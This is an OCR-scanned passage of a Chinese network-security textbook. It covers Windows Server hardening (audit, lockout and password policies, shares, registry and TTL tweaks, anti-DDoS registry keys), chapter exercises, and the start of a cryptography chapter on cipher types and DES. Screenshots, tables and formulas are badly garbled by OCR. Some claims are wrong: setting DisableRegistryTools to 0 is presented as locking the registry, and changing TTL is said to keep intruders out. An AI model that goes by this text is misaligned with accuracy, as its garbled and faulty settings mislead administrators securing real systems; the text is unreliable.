现 设置 对 话 框 ,将 复 选 框 “ 成 功 ” 和 “失败 ”都 选中 ,如 图 3-7 所 示 。 
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表 3-1 开启 审核 策略 的 设置 


策 o" 设 置 策 om 设 置 
审核 系统 登陆 事件 成 功 ,失败 审核 策略 更 改 成 功 ,失败 
审核 账户 管理 成 功 ,失败 审核 特权 使 用 成 功 ,失败 
审核 登陆 事件 成 功 ,失败 审核 系统 事件 成 功 ,失败 
审核 对 象 访问 成 功 
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3-6 ”审核 策略 的 默认 设置 
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3-7 审核 策略 的 设置 


7. 开启 账户 策略 

账户 锁定 策略 用 于 域 账户 或 本 地 用 户 账户 ,它们 确定 某 个 账户 被 系统 锁定 的 情况 和 时 
间 长 短 , 可 以 有 效 地 防止 字典 式 攻击 ,设置 如 图 3-8 所 示 ,这 部 分 包含 以 下 三 个 方面 。 

COD 账户 锁定 时 间 

该 安全 设置 确定 锁定 的 账户 在 自动 解锁 前 保持 锁定 状态 的 分 钟 数 , 有 效 范围 从 0 到 
99999 分 钟 。 如 果 将 账户 锁定 时 间 设 置 为 0. 那么 在 管理 员 明 确 将 其 解锁 前 ,该 账户 将 被 锁 
定 。 如 果 定 义 了 账户 锁定 阔 值 , 则 账户 锁定 时 间 必 须 大 于 或 等 于 重 置 时 间 。 
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3-8 ”账户 锁定 策略 的 设置 


默认 值 : 无 。 因 为 只 有 当 指定 了 账户 锁定 阔 值 时 ,该 策略 设置 才 有 意义 。 

(2) 账户 锁定 阅 值 

该 安全 设置 确定 造成 用 户 账户 被 锁定 的 登录 失败 尝试 的 次 数 。 无 法 使 用 锁定 的 账户 ， 
除非 管理 员 进行 了 重新 设置 或 该 账户 的 锁定 时 间 已 过 期 。 登 录 尝试 失败 可 设置 的 范围 为 
0 一 999。 如 果 将 此 值 设 为 0, 则 将 无 法 锁定 账户 。 

对 于 使 用 Ctrl+Alt+Delete 组 合 键 或 带 有 密码 保护 的 屏幕 保护 程序 锁定 的 工作 站 或 
成 员 服 务 器 计算 机 上 ,失败 的 密码 尝试 计 和 人 失败 的 登录 尝试 次 数 中 。 

(3) 复位 账户 锁定 计数 器 

该 安全 设置 确定 在 登录 尝试 失败 计数 器 被 复位 为 0( 即 0 次 失败 登录 尝试 ) 之 前 ,尝试 
登录 失败 之 后 所 需 的 分 钟 数 。 有 效 范围 为 1 到 99 999 分 钟 之 间 。 

如 果 定 义 了 账户 锁定 阔 值 , 则 该 复位 时 间 必 须 小 于 或 等 于 账户 锁定 时 间 。 

默认 值 : 无 ,因为 只 有 当 指 定 了 "账户 锁 定 阀 值 ? 时 ,该 策略 设置 才 有 意义 。 

与 “锁定 ”字段 相同 ,设置 该 字段 值 时 也 应 考虑 到 安全 需求 与 有 效用 户 访问 需求 之 间 的 
平衡 。 最 好 设置 为 1 到 2 小 时 。 该 等 待 时 间 应 足够 长 ,足以 强制 黑客 必须 等 待 一 个 长 于 他 
们 所 希望 的 时 间 段 后 才能 再 次 尝试 登录 。 

8. 开启 密码 策略 

密码 对 系统 安全 非常 重要 。 本 地 安全 设置 中 的 密码 策略 在 默认 的 情况 下 都 没有 开启 ， 
包括 密码 长 度 最 小 值 ,密码 最 长 使 用 期 限 、 密 码 最 短 使 用 期 限 、 强 制 密码 历史 记录 、 使 用 可 还 
原 的 加 密 存储 密码 .密码 必须 符合 复杂 性 要 求 ,设置 的 结果 如 图 3-9 所 示 。 

(1) 强制 密码 历史 记录 : 防止 用 户 创 建 与 他 们 的 当前 密码 或 最 近 使 用 的 密码 相同 的 新 
密码 。 若 要 指定 记 住 多 少 个 密码 ,请 提供 一 个 值 。 例 如 , 值 为 1 表示 仅 记 住 上 一 个 密码 , 值 
为 5 表示 记 住 前 5 个 密码 ,使 用 大 于 1 的 数字 。 

(2) 密码 最 长 使 用 期 限 : 设置 密码 有 效 天 数 的 最 大 值 。 在 此 天 数 后 ,用 户 将 必须 更 改 
密码 。 设 置 70 天 的 最 长 密码 使 用 期 限 。 将 天 数值 设置 得 太 高 将 给 黑客 破解 密码 提供 延长 
窗口 的 机 会 。 将 天 数值 设置 得 太 低 将 干扰 用 户 ,因为 必须 频繁 地 更 改 密码 。 

(3) 密码 最 短 使 用 期 限 : 设置 在 可 以 更 改 密码 前 必须 通过 的 最 短 天 数 。 将 密码 最 短 使 
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图 3-9 密码 策略 的 设置 


用 期 限 设置 为 至 少 1 天 。 通 过 这 样 做 ,将 使 用 户 一 天 只 能 更 改 一 次 密码 。 这 将 有 助 于 强制 
使 用 其 他 设置 。 例 如 ,如 果 记 住 了 过 去 的 5 个 密码 ,这 将 确保 在 用 户 可 以 重新 使 用 他 们 的 原 
始 密码 前 ,必须 至 少 经 过 5 天 。 如 果 将 密码 最 短 使 用 期 限 设置 为 0, 则 用 户 可 以 一 天 更 改 6 
次 密码 ,并 且 在 同一 天 就 可 以 开始 重新 使 用 其 原始 密码 。 

(4) 密码 长 度 最 小 值 : 指定 密码 可 以 具有 的 最 少 字 符 数 。 将 密码 设置 为 介 于 8 到 12 个 
字符 之 间 ( 假 设 它们 也 符合 复杂 性 要 求 )。 较 长 的 密码 比较 短 的 密码 更 难 破解 (假定 密码 不 
是 一 个 单词 或 普通 短语 )。 但 是 ,如 果 您 不 担心 办 公 室 或 家 中 的 人 使 用 您 的 计算 机 , 则 不 使 
用 密码 比 使 用 容易 猜 到 的 密码 能 够 更 好 地 保护 您 的 计算 机 不 受 黑客 从 Internet 或 其 他 网 络 
攻击 的 侵害 。 如 果 不 使 用 密码 , Windows 将 自动 防止 任何 人 从 Internet 或 其 他 网 络 登录 到 
您 的 计算 机 。 

(5) 密码 必须 符合 复杂 性 要 求 ,要 求 密码 : 

。 至 少 有 6 位 字符 长 

。 至 少 包含 三 种 下 列 字符 的 组 合 : 大 写字 母 .小 写字 母 .数字 和 符号 (标点 符号 ) 

。 不 要 包含 用 户 的 用 户 名 或 主机 名 称 

启用 此 设置 。 这 些 复 杂 性 要 求 可 以 帮助 创建 强 密码 。 

C6) 使 用 可 还 原 的 加 密 存储 密码 : 存储 密码 而 不 对 其 加 密 ,除非 使 用 的 程序 要 求 ,否则 
不 要 使 用 此 设置 。 

9. 关闭 默认 共享 

低 版 本 的 Windows Server 安装 以 后 ,系统 会 创建 一 些 隐 藏 的 共享 ,可 以 在 DOS 提示 符 
下 输入 命令 net share 查看 ,如 图 3-10 所 示 。 

禁止 这 些 共享 ,打开 “管理 工具 ”一 “计算 机 管理 ”>“ 共 享 文件 夹 ”->“ 共 享 ”, 在 相应 的 共 
享 文件 夹 上 单 击 右键 , 单 击 停止 共享 即 可 ,如 图 3-11 所 示 。 
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3-11 停止 共享 的 设置 


10. 禁用 Dump 文件 

在 系统 崩溃 和 蓝屏 的 时 候 ,Dump 文件 是 一 份 很 有 用 资料 ,可 以 帮助 查找 问题 。 然 而 ， 
也 能 够 给 黑客 提供 一 些 敏感 信息 ,比如 一 些 应 用 程序 的 密码 等 。 需 要 禁止 它 , 打 开 * 控 制 面 
板 ”>“ 系 统 属性 ”一 “高 级 ”>“ 启 动 和 故障 恢复 ”, 把 写 信 调试 信息 改 成 无 ,如 图 3-12 所 示 。 

11. 锁定 注册 表 

只 有 Administrators 和 Backup Operators 才 有 从 网 络 上 访问 注册 表 的 权限 。 当 账号 
的 密码 泄漏 以 后 ,黑客 也 可 以 在 远程 访问 注册 表 , 当 服务 器 放 到 网 络 上 的 时 候 , 一 般 需 要 锁 
定 注册 表 。 修 改 Hkey current _ user 下 的 子 键 Software V microsoft V windows V 
currentversionV Policies V system 把 DisableRegistry Tools 的 值 改 为 0, 类 型 为 DWORD, 如 
图 3-13 所 示 。 

12. 关机 时 清除 文件 

页 面 文 件 也 就 是 调度 文件 ,是 Windows 2000 用 来 存储 没有 装 入 内 存 的 程序 和 数据 文 
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aix 

三 系统 局 动 
默认 换 作 系统 O: 
"Microsoft Windows 2000 Server" /fastdetect z] 
F ezeta D ge. 

pR 
P HERPERJGREERIE QU 
v REFERT 

fv 自动 重新 启动) 

一 写 入 再 友信 息 


DN LI LL 


333 ” 锁 住 注册 表 的 设置 


件 部 分 的 隐藏 文件 。 一 些 第 三 方 的 程序 可 以 把 一 些 没有 加 密 的 密码 存在 内 存 中 ,页 面 文件 
中 可 能 含有 另外 一 些 敏 感 的 资料 。 要 在 关机 的 时 候 清除 页 面 文件 ,可 以 编辑 注册 表 ,修改 主 
fit HKEY LOCAL MACHINE 下 的 子 键 : 


SYSTEM\ CurrentControlSet\Control\Session Manager\Memory Management, 


把 ClearPageFileAtShutdown 的 值 设置 成 1, 如 图 3-14 所 示 。 

13. 禁止 判断 主机 类 型 

黑客 利用 TTL(Time-To-Live, 活 动 时 间 ) 值 可 以 鉴别 操作 系统 的 类 型 ,通过 ping 指令 
能 判断 目标 主机 类 型 。ping 的 用 处 是 检测 目标 主机 是 否 连通 。 

许多 入 侵 者 首先 会 ping 一 下 主机 ,因为 攻击 某 一 台 计算 机 需要 根据 对 方 的 操作 系统 ， 
是 Windows 还 是 UNIX。 如 果 TTL 值 为 128 就 可 以 认为 你 的 系统 为 Windows Server 或 
Windows XP, 如 图 3-15 所 示 。 
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c me 
注册 表 (R) SWO EEV BRO EMH 


ssion Manager 
aC] AppCompatibiity 


C] FieRenameOperation: 


C knownbiLs 


& C] AppPatches REG DW. 
= pos REG DW. 
REG DW. 

&X)NonPagedPoolQuota REG, DWC 


REG, DWORD 
REG DWORD 


8E < 
Ghi ED 


0x00000001 (1) 


000000000 (0) 


0x00000000 (0) 


Cilpagefile.sys 384 768 


REG DWORD 


3EROHERBHKEY. LOCAL, MACHINE|SYSTEM|CurrentControlSet|Controfl Session Managerl Memory Management 


图 3-14 关机 时 清除 文件 的 设置 


WINDOWS systenJ2Vcmd. exe [-|5] 


Connection-specific DNS Suffix 

IP Rddress. . 2 2e e : 192.168.1.2 
Subnet Mask 。 。 。 。 。 。 。。。。。: 255.255.255.0 
Default Gateway . - - - - - - 192.168.1.1 


Ethernet adapter (7878E180-63B6—47C8-9721-B788261FC576) : 


Media State - : Media disconnected 


À Setti trator)ping 192.168.1.2 


Pinging 192.168.1.2 with 32 bytes of data: 


Reply from -168.1.2: bytes=32 tineCins 
Reply from 192.168. bytes*32 timeCims 
rom 192.168. tine<ins 
rom 192.168. 2 tineins 
Ping statist 192. 
Packets: Sent = 4, Received = 4, Lost = 8 «8» loss), 
pproximate round trip times in nilli-seconds: 


Minimum = Gns, Maxinum = Ons, Average = Üns 


C:\Documents and Settings\hdninistrator》 ni 


A 3-15 ping 主机 的 结果 
从 图 中 可 以 看 出 ,TTL 值 为 128, 说 明 主机 的 操作 系统 是 Windows Server 或 Windows 
XP 操作 系统 , 表 3-2 给 出 了 一 些 常见 操作 系统 的 对 照 值 。 
表 3-2 常见 操作 系统 的 对 照 值 
值 操作 系统 类 型 


操作 系统 类 型 


TTL 返回 值 


Windows 2000 IRIX 240 
Windows XP AIX 247 
Solaris Linux 241 or 240 


修改 TTL 的 值 , 入 侵 者 就 无 法 入 侵 电脑 了 。 
主键 HKEY LOCAL MACHINE 的 子 键 : 


比如 将 操作 系统 的 TTL 值 改 为 100 ,修改 


SYSTEM\ Current ControlSet\Services\Tcpip\Parameters 
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新 建 一 个 双 字 节 项 ,在 键 的 名 称 中 输入 “DefaultTTL”, 然 后 双击 改 键 名 ,选择 单 选 框 
“十 进 制 ”, 在 文本 框 中 输入 100, 如 图 3-16 所 示 。 
E 
s ^| 名 称 
四 国 供认 
ab] DataBazeFath 
e 数值 名称 
De£oultTTL 
mim o 基数 
100 十 六 进 制 0 
十 进 制 0D) 0x0000000 
00000000 
FRC-20131 
00000000 
* LL] TeraDD axConnecti on. Ox0000000 
* Ter Si)WaxUserPort 0x0000271 
S C) The ab] Wan eServer 
$ LJ Tintsw WY Hostname TRC-20131 V 
|« » a > 
SERO NE HKEY LOCAL. ACHINEXSTSTEN Curr entControlSet\Services\Tepip\Paraneters 
3-316 修改 TTL 的 值 
设置 完毕 重新 启动 计算 机 ,再 用 ping 指令 ,发现 TTL 的 值 已 经 被 改 成 100 了 ,如 图 3-1 


所 示 。 


Connection-specific DNS Suffix 
IP Address. . . - 192.168.1.2 
Subet Mask... . e -255.0 
Default Gateway . . . . . . . . . : 192.168.1.1 
Ethernet adapter (7878E188-63B6—47C8-9721-B788261FC576 
Media State : Media disconnected 
ts and Settings idninist r>ping 192.168.1.2 


Pinging 192.168.1.2 with 32 bytes of data: 


192.168. 
192.168. 


1 2 tineX1ns TIL-180 
1 2 time< TTL=100 

192.168.1.2: tine<ins TTIL-100 
1.2: 


Reply from 192.168. 2 time<ims TIL-180 


[Ping statistics for 192.168.1.2: 
Packet: Sent Received = 4, Lost = @ Bx loss), 
pproxinate round trip tines in nilli-seconds: 
Minimum = Gns, Maximum = Bas, Average = Gns 


:\Docunents and Settings Administrator) 


图 3-17 修改 后 的 TIL 值 
14. 抵抗 DDoS 
添加 注册 表 的 一 些 键 值 ,可 以 有 效 地 抵抗 DDoS 的 攻击 。 在 键 值 
[HKEY_LOCAL MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters] 


下 增加 响应 的 键 及 其 说 明 如 表 3-3 所 示 。 
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表 3-3 抵抗 DDoS 设置 的 键 值 


增加 的 键 值 键 值 说 明 
“EnablePMTUDiscovery”= dword:00000000 
*NoNameReleaseOnDemand" = dword:00000000 
“KeepAliveTime”= dword:00000000 EAE 
*PerformRouterDiscovery" — dword 00000000 
*EnableICMPRedirects" = dword 00000000 防止 ICMP 重 定向 报 文 的 攻击 
“SynAttackProtect”= dword:00000002 防止 SYN 洪水 攻击 
"'TepMaxHalfOpenRetried" = dword:00000080 仅 在 TepMaxHalfOpen 和 TcpMaxHalfOpenRetried 
"'TepMaxHalfOpen" — dword;00000100 设置 超出 范围 时 ,保护 机 制 才 会 采取 措施 
*IGMPLevel"— dword;00000000 不 支持 IGMP 协议 
“EnableDeadGW Detect” =dword :00000000 禁止 死 网 关 监 测 技术 
“IPEnableRouter” =dword:00000001 支持 路 由 功能 


习 mW 3 


一 、 填 空 题 

1. 一 套 可 以 免费 使 用 和 自由 传播 的 类 UNIX 操作 系统 ,主要 用 于 
CPU 的 计算 机 上 的 操作 系统 是 

2. Solaris 操作 系统 的 TTL 值 是 d 

3. 在 系统 崩溃 和 蓝屏 的 时 候 ， 文件 是 一 份 很 有 用 的 资料 ,可 以 帮助 查找 问题 。 

4. 查看 磁盘 和 文件 共享 的 命令 是 

5. 所 谓 的 陷阱 账号 是 创建 一 个 名 为 的 本 地 账户 ,把 它 的 权限 设置 成 最 低 。 

二 、 简 答题 

1. 简 述 LINUX 安全 配置 方案 。 

2. 简 述 审核 策略 、 密 码 策略 和 账户 策略 的 含义 ,以 及 这 些 策 略 如 何 保护 操作 系统 不 被 
入 侵 。 


T 


基于 Intel x86 系列 
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m 掌握 密码 学 的 基本 概念 ,对 称 秘 钥 加 密 和 公开 密 钥 加 密 技术 。 
W 3€ DES,RSA,PGP 三 种 加 密 算法 。 
Wo 掌握 数字 签名 和 数字 证 书 , 数 字 水 印 技术 。 


4.1 密码 学 


4.1.1 密码 学 概述 


密码 学 是 一 门 古老 而 深奥 的 学 科 , 它 对 一 般 人 来 说 是 陌生 的 ,因为 长 期 以 来 , 它 只 在 
很 小 的 范围 内 ,如 军事 、 外 交 、 情 报 等 部 门 使 用 。 计 算 机 密码 学 是 研究 计算 机 信息 加 密 、 
解密 及 其 变换 的 科学 ,是 数学 和 计算 机 的 交叉 学 科 , 也 是 一 门 新 兴 的 学 科 。 随 着 计算 机 
网 络 和 计算 机 通信 技术 的 发 展 ,计算 机 密码 学 得 到 前 所 未 有 的 重视 并 迅速 普及 和 发 展 起 
来 。 在 国外 , 它 已 成 为 计算 机 安全 主要 的 研究 方向 ,也 是 计算 机 安全 课程 教学 中 的 主要 
内 容 。 

密码 是 实现 秘密 通信 的 主要 手段 ,是 隐蔽 语言 .文字 、 图 像 的 特种 符号 。 凡 是 用 特种 符 
号 按照 通信 双方 约定 的 方法 把 电文 的 原形 隐 项 起 来 ,不 为 第 三 者 所 识别 的 通信 方式 都 称 为 
密码 通信 。 在 计算 机 通信 中 ,采用 密码 技术 将 信息 隐蔽 起 来 ,再 将 隐蔽 后 的 信息 传输 出 去 ， 
使 信息 在 传输 过 程 中 即使 被 窃取 或 截获 .窃取 者 也 不 能 了 解 信息 的 内 容 , 从 而 保证 信息 传输 
的 安全 。 

任何 一 个 加 密 系统 至 少 包括 下 面 4 个 组 成 部 分 。 

(1) 未 加 密 的 报 文 ,也 称 明文 。 

(2) 加 密 后 的 报 文 ,也 称 密 文 。 

(3) 加 密 解 密 设 备 或 算法 。 

(4) 加 密 解 密 的 密 钥 。 

发 送 方 用 加 密 密 钥 ,通过 加 密 设 备 或 算法 ,将 信息 加 密 后 发 送出 去 。 接 收 方 在 收 到 密 文 
后 ,用 解密 密 钥 将 密 文 解密 ,恢复 为 明文 。 如 果 传 输 中 有 人 窃取 ,他 只 能 得 到 无 法 理解 的 密 
文 ,从 而 对 信息 起 到 保密 作用 。 


4.1.2. 密码 的 分 类 
从 不 同 的 角度 根据 不 同 的 标准 ,可 以 把 密码 分 成 若干 类 。 
1. 按 应 用 技术 或 历史 发 展 阶 段 划分 


COD 手工 密码 。 以 手工 完成 加 密 作业 ,或 者 以 简单 器 具 辅 助 操作 的 密码 , 叫 作 手工 密 
码 。 第 一 次 世界 大 战 前 主要 是 这 种 作业 形式 。 
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(2) 机 械 密码 。 以 机 械 密码 机 或 电动 密码 机 来 完成 加 解密 作业 的 密码 , 叫 作 机 械 密码 。 
这 种 密码 从 第 一 次 世界 大 战 出 现 到 第 二 次 世界 大 战 中 得 到 普遍 应 用 。 

G) 电子 机 内 乱 密 码 。 通 过 电子 电路 ,以 严格 的 程序 进行 逻辑 运算 ,以 少量 制 乱 元 素 生 
产 大 量 的 加 密 乱 数 ,因为 其 制 乱 是 在 加 解密 过 程 中 完成 的 而 不 需 预 先 制作 ,所 以 称 为 电子 机 
内 乱 密 码 。 从 20 世纪 50 年 代 末 期 出 现 到 70 年 代 广泛 应 用 。 

(4) 计算 机 密码 。 以 计算 机 软件 编程 进行 算法 加 密 为 特点 ,适用 于 计算 机 数据 保护 和 
网 络 通信 等 广泛 用 途 的 密码 。 

2. 按 保密 程度 划分 

CD 理论 上 保密 的 密码 。 不 管 获取 多 少 密 文 和 有 多 大 的 计算 能 力 , 对 明文 始终 不 能 得 
到 唯一 解 的 密码 , 叫 作 理论 上 保密 的 密码 ,也 叫 理论 不 可 破 的 密码 。 

(2) 实际 上 保密 的 密码 。 在 理论 上 可 破 , 但 在 现 有 客观 条 件 下 ,无 法 通过 计算 来 确定 唯 
一 解 的 密码 , 叫 作 实际 上 保密 的 密码 。 

(3) 不 保密 的 密码 。 在 获取 一 定数 量 的 密 文 后 可 以 得 到 唯一 解 的 密码 , 叫 作 不 保密 密 
码 。 如 早期 单 表 代替 密码 ,后 来 的 多 表 代替 密码 ,以 及 明文 加 少量 密 钥 等 密码 ,现在 都 成 为 
不 保密 的 密码 。 

3. 按 密 钥 方式 划分 

CD 对 称 式 密码 。 收 发 双方 使 用 相同 密 钥 的 密码 , 叫 作对 称 式 密码 。 传 统 的 密码 都 属 
此 类 。 

(2) 非 对 称 式 密 码 。 收 发 双方 使 用 不 同 密 钥 的 密码 , 叫 作 非 对 称 式 密码 。 如 现代 密码 
中 的 公共 密 钥 密码 就 属 此 类 。 

4. 按 明文 形态 

(1) 模拟 型 密码 。 用 以 加 密 模 拟 信 息 。 如 对 动态 范围 之 内 ,连续 变化 的 语音 信号 加 密 
的 密码 , 叫 作 模拟 式 密码 。 

(2) 数字 型 密码 。 用 于 加 密 数字 信息 。 对 两 个 离散 电 平 构成 0、1 二 进 制 关系 的 电报 信 
息 加 密 的 密码 叫 作 数字 型 密码 。 

5. 按 编制 原理 划分 

可 分 为 移 位 .代替 和 置换 三 种 以 及 它们 的 组 合 形式 。 古 今 中 外 的 密码 ,不 论 其 形态 多 么 
繁杂 ,变化 多 么 巧妙 ,都 是 按照 这 三 种 基本 原理 编制 出 来 的 。 移 位 .代替 和 置换 这 三 种 原理 
在 密码 编制 和 使 用 中 相互 结合 ,灵活 应 用 。 
4.1.3 基本 功能 

数据 加 密 的 基本 思想 是 通过 变换 信息 的 表示 形式 来 伪装 需要 保护 的 敏感 信息 ,使 非 授 
权 者 不 能 了 解 被 保护 信息 的 内 容 。 网 络 安全 使 用 密码 学 来 辅助 完成 在 传递 敏感 信息 时 的 相 
关 问题 ,主要 包括 以 下 几 点 。 

1. 机 密 性 (Confidentiality) 

仅 有 发 送 方 和 指定 的 接收 方 能 够 理解 传输 的 报 文 内 容 。 窃 听 者 可 以 截取 到 加 密 了 的 报 
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文 ,但 不 能 还 原 出 原来 的 信息 , 即 不 能 得 到 报 文 内 容 。 

2. 鉴别 (Authentication) 

发 送 方 和 接收 方 都 应 该 能 证 实 通 信 过 程 所 涉及 的 另 一 方 确实 具有 他 们 所 声称 的 身份 。 
即 第 三 者 不 能 冒充 通信 的 对 方 ,通信 双方 能 对 对 方 的 身份 进行 鉴别 。 

3. 报 文 完整 性 (Message Integrity) 

即使 发 送 方 和 接收 方 可 以 互相 鉴别 对 方 , 但 他 们 还 需要 确保 其 通信 的 内 容 在 传输 过 程 
中 未 被 改变 。 

4. 不 可 否认 性 (Non-Repudiation) 

人 们 收 到 通信 对 方 的 报 文 后 ,还 要 证 实 报 文 确实 来 自 所 宣称 的 发 送 方 ,发 送 方 也 不 能 在 
发 送 报 文 以 后 否认 自己 发 送 过 报 文 。 
4.1.4 加 密 和 解密 


遵循 国际 命名 标准 ,加 密 和 解密 可 以 翻译 成 : Encipher( 加 密 密 码 ) 和 Decipher( 解 密 密 
码 )。 也 可 以 这 样 命 名 : Encrypt( 加 密 ) 和 Decrypt( 解 密 )。 

消息 被 称 为 明文 。 用 某 种 方法 伪装 消息 以 隐藏 它 的 内 容 的 过 程 称 为 加 密 , 加 密 了 的 消 
息 称 为 密 文 ,而 把 密 文 转变 为 明文 的 过 程 称 为 解密 。 

明文 用 M(Message, 消 息 ) 或 P(Plaintext, 明 文 ) 表 示 , 它 可 能 是 比特 流 、 文 本 文件 .位 
图 .数字 化 的 语音 流 或 者 数字 化 的 视频 图 像 等 。 

密 文 用 C(Cipher) 表 示 , 也 是 二 进 制 数 据 , 有 时 和 M 一 样 大 ,有 时 稍 大 。 通 过 压缩 和 加 
密 的 结合 ,C 有 可 能 比 P 小 些 。 

密 钥 用 K 表示 ,加 密 函 数 巨 ,解密 函数 D 。K 可 以 是 很 多 数值 里 的 任意 值 , 密 钥 K 的 
可 能 值 的 范围 叫做 密 钥 空间 。 加 密 和 解密 运算 都 使 用 这 个 密 钥 , 即 运算 都 依赖 于 密 钥 ,并 用 
K 作为 下 标 表 示 ,加 解密 函数 表达 为 : 

Ek(M)=C 

D&y(CO) —M 

Dx (Erk VD) — M. WA 4-1 所 示 。 


jen jen 


明文 原始 明文 


加 密 解密 


4-1 加 密 和 解密 过 程 


4.1.5 对 称 算法 和 公开 密 钥 算法 


1. 对 称 算法 

基于 密 钥 的 算法 通常 有 两 类 : 对 称 算法 和 公开 密 钥 算法 ( 非 对 称 算法 )。 对 称 算法 有 时 
又 叫 传统 密码 算法 ,加 密 密 钥 能 够 从 解密 密 钥 中 推算 出 来 , 反 过 来 也 成 立 。 

在 大 多 数 对 称 算法 中 .加 解密 的 密 钥 是 相同 的 。 对 称 算法 要 求 发 送 者 和 接收 者 在 安全 
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通信 之 前 ,协商 一 个 密 钥 。 对 称 算法 的 安全 性 依赖 于 密 钥 ,泄漏 密 钥 就 意味 着 任何 人 都 能 对 
消息 进行 加 解密 。 对 称 算法 的 加 密 和 解密 表示 为 : 
Ex(M) = C 
Dx(C) =M 
对 称 算法 可 分 为 两 类 : 序列 密码 ( 流 密码 ) 与 分 组 密码 。 序 列 密码 一 直 是 作为 军 方 和 政 
府 使 用 的 主要 密码 技术 之 一 , 它 的 主要 原理 是 ,通过 伪 随 机 序列 发 生 器 产生 性 能 优良 的 伪 随 
机 序列 ,使 用 该 序列 加 密 信息 流 ( 逐 比特 加 密 ) ,得 到 密 文 序列 ,所 以 ,序列 密码 算法 的 安全 强 
度 完全 取决 于 伪 随 机 序列 的 好 坏 。 伪 随机 序列 发 生 器 是 指 输入 真 随机 的 较 短 的 密 钥 (种 子 ) 
通过 某 种 复杂 的 运算 产生 大 量 的 伪 随 机 位 流 。 
序列 密码 算法 将 明文 逐 位 转换 成 密 文 。 该 算法 最 简单 的 应 用 如 图 4-2 所 示 。 密 钥 流 发 
生 器 输出 一 系列 比特 流 : Ki ,Ks ,Ks,…,K;。 密 钥 流 跟 明 文 比特 流 Pi, Pe, Past Pi, HEIT 
异 或 运算 产生 密 文 比特 流 。 


Ci 一 Pi OK; 
在 解密 端 , 密 文 流 与 完全 相同 的 密 钥 流 异 或 运算 恢复 出 明文 流 。 


XC, 
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分 组 密码 是 将 明文 分 成 固定 长 度 的 组 ( 块 ), 如 64b 一 组 ,用 同一 密 钥 和 算法 对 每 一 块 加 
密 , 输 出 也 是 固定 长 度 的 密 文 。 

2. 公开 密 钥 算法 

公开 密 钥 算 法 中 用 作 加 密 的 密 钥 不 同 于 用 作 解 密 的 密 钥 ,而 且 解 密 密 钥 不 能 根据 加 密 
密 钥 计算 出 来 (至 少 在 合理 假定 的 长 时 间 内 ), 所 以 加 密 密 钥 能 够 公开 ,每 个 人 都 能 用 加 密 密 
钥 加 密 信息 ,但 只 有 解密 密 钥 的 拥有 者 才能 解密 信息 。 在 公开 密 钥 算 法 系统 中 ,加 密 密 钥 叫 
做 公开 密 钥 (简称 公 钥 ) ,解密 密 钥 叫做 秘密 密 钥 (私有 密 钥 ,简称 私 钥 ) 。 

公开 密 钥 算 法 主要 用 于 加 密 /解密 、 数 字 签 名 、 密 钥 交 换 。 自 从 1976 年 公 钥 密码 的 思想 
提出 以 来 ,国际 上 已 经 出 现 了 许多 种 公 钥 密码 体制 ,比较 流行 的 有 基于 大 整数 因子 分 解 问题 
的 RSA 体制 和 Rabin 体制 .基于 有 限 域 上 的 离散 对 数 问题 的 Differ-Hellman 公 钥 体制 和 
ElGamal 体制 .基于 椭圆 曲线 上 的 离散 对 数 问 题 的 Differ-Hellman 公 钥 体制 和 ElGamal f 
制 。 这 些 密码 体制 有 的 只 适合 于 密 钥 交换 ,有 的 只 适合 于 加 密 /解密 。 

公开 密 钥 Ki 加 密 表示 为 : Ex, MD 一 C。 公 开 密 钥 和 私有 密 钥 是 不 同 的 ,用 相应 的 私 
有 密 钥 K: 解密 可 表示 为 : Dk, (OSM, 
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4.2 DES 对 称 加 密 技术 


4.2.1 DES 对 称 加 密 技 术 简 介 


最 著名 的 私有 密 钥 或 对 称 密 钥 加 密 算法 DES(Data Encryption Standard) 是 由 IBM 公 
司 在 70 年 代 发 展 起 来 的 ,并 经 过 政府 的 加 密 标 准 筛选 后 ,于 1976 年 11 月 被 美国 政府 采用 ， 
DES 随后 被 美国 国家 标准 局 和 美国 国家 标准 协会 (American National Standard Institute， 
ANSI) 承 认 。 加 密 算法 要 达到 的 目的 有 4 点。 

(1) 提供 高 质量 的 数据 保护 ,防止 数据 未 经 授权 的 泄露 和 未 被 察觉 的 修改 ; 

(2) 具有 相当 高 的 复杂 性 ,使 得 破译 的 开销 超过 可 能 获得 的 利益 ,同时 又 要 便于 理解 和 
掌握 

(3) DES 密码 体制 的 安全 性 应 该 不 依赖 于 算法 的 保密 ,其 安全 性 仅 以 加 密 密 钥 的 保密 
为 基础 ; 

(4) 实现 经 济 ,运行 有 效 , 并 且 适 用 于 多 种 完全 不 同 的 应 用 。 


4.2.2 DES 的 安全 性 


DES 算法 正式 公开 发 表 以 后 ,引起 了 一 场 激烈 的 争论 。1977 年 Diffie 和 Hellman 提出 
了 制造 一 个 每 秒 能 测试 106 个 密 钥 的 大 规模 芯片 ,这 种 芯片 的 机 器 大 约 一 天 就 可 以 搜索 
DES 算法 的 整个 密 钥 空 间 , 制 造 这 样 的 机 器 需要 两 千 万 美元 。 

1993 年 R. Session 和 M. Wiener 给 出 了 一 个 非常 详细 的 密 钥 搜索 机 器 的 设计 方案 , 它 
基于 并 行 的 密 钥 搜索 芯片 ,此 芯片 每 秒 测试 5X107 个 密 钥 ,当时 这 种 芯片 的 造价 是 10. 5 美 
元 ,5760 个 这 样 的 芯片 组 成 的 系统 需要 10 万 美元 ,这 一 系统 平均 1. 5 天 即 可 找到 密 钥 , 如 
果 利 用 10 个 这 样 的 系统 ,费用 是 100 万 美元 ,但 搜索 时 间 可 以 降 到 2. 5 小时。 可见 这 种 机 
制 是 不 安全 的 。 

1997 年 1 月 28 日 ,美国 的 RSA 数据 安全 公司 在 互联 网 上 开展 了 一 项 名 为 “ 密 钥 挑战 ” 
的 竞赛 ,悬赏 一 万 美元 ,破解 一 段 用 56 比特 密 钥 加 密 的 DES 密 文 。 计 划 公 布 后 引起 了 网 络 
用 户 的 强力 响应 。 一 位 名 叫 Rocke Verser 的 程序 员 设 计 了 一 个 可 以 通过 互联 网 分 段 运行 
的 密 钥 穷 举 搜索 程序 ,组织 实施 了 一 个 称 为 DESHALL 的 搜索 行动 ,成 千 上 万 的 志愿 者 加 
入 到 计划 中 ,在 计划 实施 的 第 96 天 , 即 挑战 赛 计划 公布 的 第 140 天 ,1997 年 6 月 17 日 晚上 
10 点 39 分 ,美国 盐湖 城 Inetz 公司 的 职员 Michael Sanders 成 功 地 找到 了 密 钥 , 在 计算 机 上 
显示 了 明文 :“The unknown message is: Strong cryptography makes the world a safer 


place", 
4.2.3 DES 算法 的 原理 

DES 算法 的 入 口 参数 有 三 个 : Key、Data、Mode。 其 中 Key 为 8 个 字 节 共 64 位 ,是 
